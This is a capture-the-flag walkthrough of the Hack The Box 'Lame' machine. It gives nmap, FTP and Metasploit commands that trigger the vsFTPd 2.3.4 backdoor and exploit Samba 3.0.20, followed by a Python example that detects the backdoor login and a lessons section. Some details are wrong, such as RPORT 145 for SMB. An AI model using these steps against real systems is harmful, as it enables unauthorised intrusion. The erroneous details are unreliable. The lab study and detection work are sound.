Linux Box Lame Walkthrough
1. First, find the machine in Hack The Box, then in our VM connect to the VPN (sudo openvpn <.ovpn file>) and ping the target box. If the TTL is between 1-64, it is generally a Linux box. 64-128 is probably a Windows host. 128-255 is a network appliance. This isn't always the case, but it generally holds.
2. MITRE ATT&CK T1595, Active Scanning. We run (sudo nmap -vv -Pn -sCV -p0-65535 --reason -oN lame.nmap 10.10.10.3). This assumes the host is active, runs the default scripts and version enumeration, shows the reason for each reported port state (for example, why certain ports are blocked), and writes the results to an output file called lame.nmap.
3. T1592.002, Gather Victim Host Information. We see that port 21 is available on the host, so while nmap is still running we gather info (ftp 10.10.10.3).
4. We then get a banner that says it is running vsFTPd 2.3.4.
5. We then open searchsploit and search for vsFTPd.
6. msfconsole
7. search vsftpd
8. We can exploit this with Metasploit, but if we look at the code we can see that it has a hard-coded smiley face, :), in the ID field that opens it.
9. We can go back to ftp and use the :). To do this we log in with USER username:) and PASS test.
10. We then run nc 10.10.10.3 6200. When we enter id, nothing happens, so we continue our exploitation by going back to our scan. We see that 22 is open, but that isn't always the easiest to exploit. SMB is open as well, so we decide to search for that.
11. searchsploit smb 3.0.20 and searchsploit samba 3.0.20
12.
- In msfconsole, search samba 3.0.20
- use 0
- options
13. set RHOST 10.10.10.3
14. set RPORT 145
15. set LHOST
16. Set the host to our VPN address from HTB.
17. With our payload set to automatic, run.
18. sudo smbclient --no-pass //10.10.10.3/tmp
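
The :) username from steps 8-9 and the follow-up connection to port 6200 in step 10 both leave traces a defender can look for, whether or not the connection yields anything. The Python below is an added example, not part of the original walkthrough: the log lines are constructed, the FTP lines are modeled on vsftpd's protocol log, and the connection-log format and 60-second window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample data (not from the walkthrough). FTP lines are modeled on
# vsftpd's protocol log; the connection-log format is an assumed one.
FTP_LOG = '''\
Mon Mar  4 10:15:02 2024 [pid 2101] FTP command: Client "10.10.14.5", "USER username:)"
Mon Mar  4 10:15:03 2024 [pid 2101] FTP command: Client "10.10.14.5", "PASS <password>"
Mon Mar  4 10:20:41 2024 [pid 2140] FTP command: Client "10.10.14.9", "USER backup"
'''
CONN_LOG = '''\
2024-03-04T10:15:05 src=10.10.14.5 dst=10.10.10.3 dport=6200 proto=tcp
2024-03-04T10:21:00 src=10.10.14.9 dst=10.10.10.3 dport=21 proto=tcp
'''

USER_RE = re.compile(r'^(.+?) \[pid \d+\] FTP command: Client "([^"]+)", "USER ([^"]*)"')
CONN_RE = re.compile(r'^(\S+) src=(\S+) dst=\S+ dport=(\d+)')
BACKDOOR_PORT = 6200            # port the walkthrough connects to with nc
WINDOW = timedelta(seconds=60)  # assumed correlation window

def trigger_logins(ftp_log):
    """Return (time, client, username) for every USER command containing ':)'."""
    hits = []
    for line in ftp_log.splitlines():
        m = USER_RE.match(line)
        if m and ":)" in m.group(3):
            ts = datetime.strptime(m.group(1), "%a %b %d %H:%M:%S %Y")
            hits.append((ts, m.group(2), m.group(3)))
    return hits

def correlate(ftp_log, conn_log):
    """Flag each trigger login and note whether the same client then hit tcp/6200."""
    conns = []
    for line in conn_log.splitlines():
        m = CONN_RE.match(line)
        if m and int(m.group(3)) == BACKDOOR_PORT:
            conns.append((datetime.fromisoformat(m.group(1)), m.group(2)))
    alerts = []
    for ts, client, user in trigger_logins(ftp_log):
        followed = any(src == client and timedelta(0) <= t - ts <= WINDOW
                       for t, src in conns)
        alerts.append({"client": client, "user": user, "port_6200_followup": followed})
    return alerts

if __name__ == "__main__":
    for alert in correlate(FTP_LOG, CONN_LOG):
        print(alert)
```

A login alert with no port 6200 follow-up is still worth triage, since the username pattern alone has no legitimate use.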
Lessons Learned
The Hack The Box Lame challenge provided valuable insights into ethical hacking and exploit discovery. By leveraging MITRE attack methods, I successfully navigated the challenge using steps that included active scanning and gathering victim host information. Through careful observation and analysis of the target machine, I was able to identify vulnerabilities and potential exploits. By examining the banner response of the FTP server, I discovered the version of vsFTPd running, which led me to search for specific exploits. Using the Metasploit Framework, I configured the necessary options and executed the chosen exploits. The challenge highlighted the importance of persistence and the understanding that not all vulnerabilities directly lead to access, but they can serve as crucial steps toward achieving the ultimate goal.